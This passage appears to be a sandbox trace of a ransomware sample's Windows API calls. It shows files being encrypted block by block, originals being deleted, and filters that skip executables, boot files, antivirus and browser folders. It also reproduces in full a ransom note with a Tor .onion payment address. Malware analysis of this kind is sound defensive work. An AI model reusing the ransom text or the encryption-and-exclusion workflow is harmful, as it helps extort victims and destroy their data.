lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.296] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.296] GetLastError () returned 0x0 [0157.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.296] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.296] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.296] GetLastError () returned 0x0 [0157.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.296] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.296] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.296] GetLastError () returned 0x0 [0157.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.296] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.296] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.296] GetLastError () returned 0x0 [0157.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.296] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.296] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.296] GetLastError () returned 0x0 [0157.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.296] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0xc3, lpOverlapped=0x0) returned 1 [0157.297] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xc3, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xd0) returned 1 [0157.297] GetLastError () returned 0x0 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xd0, lpOverlapped=0x0) returned 1 [0157.297] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.297] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml")) returned 0x20 [0157.298] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", dwFileAttributes=0x20) returned 0 [0157.298] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 1 [0157.298] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml")) returned 0 [0157.298] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" [0157.298] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.298] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD9B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd9b4.tmp")) returned 0xd9b4 [0157.299] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD9B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd9b4.tmp"), dwFlags=0x1) returned 0 [0157.299] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD9B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd9b4.tmp")) returned 1 [0157.299] CryptDestroyKey (hKey=0x9ad278) returned 1 [0157.299] wcslen (_String="OK") returned 0x2 [0157.299] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.299] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.300] CryptDestroyKey (hKey=0x9ad538) returned 1 [0157.300] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0157.300] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0157.300] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0157.300] GetLastError () returned 0x12 [0157.300] FindClose (in: hFindFile=0x9ad478 | out: hFindFile=0x9ad478) returned 1 [0157.300] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0157.300] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.301] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.301] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0157.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.301] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0157.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.exe") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.dll") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.lnk") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.bat") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.ini") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.msi") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*.scf") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*pagefile.sys*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*NTUSER.DAT*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*AppData*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\winrar\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\java\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\windows\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\ESET\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\AVG\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\AVIRA\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0157.301] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*Atheros*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*Realtek*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*bootmgr*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*boot*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*boot*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*CONFIG.SYS*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*IO.SYS*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*MSDOS.SYS*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*NTDETECT.COM*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*ntldr*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*chrome*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*opera*") returned 0 [0157.302] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", pszSpec="*firefox*") returned 0 [0157.302] wcslen (_String="\\\\?\\") returned 0x4 [0157.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad7f8 [0157.302] wcscmp (_String1=".", _String2=".") returned 0 [0157.302] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.302] wcscmp (_String1="..", _String2=".") returned 1 [0157.303] wcscmp (_String1="..", _String2="..") returned 0 [0157.303] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*NMCRYPT") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*Recovers your files.html") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.exe") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.dll") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.lnk") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.bat") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.ini") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.msi") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*.scf") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*pagefile.sys*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*AppData*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\winrar\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\java\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\windows\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\ESET\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\AVG\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*Atheros*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*Realtek*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*bootmgr*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*boot*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*boot*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*IO.SYS*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*ntldr*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*chrome*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*opera*") returned 0 [0157.303] PathMatchSpecW (pszFile="oskclearuibase.xml", pszSpec="*firefox*") returned 0 [0157.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", pszSpec="*") returned 1 [0157.303] strlen (_Str="NMoreira") returned 0x8 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 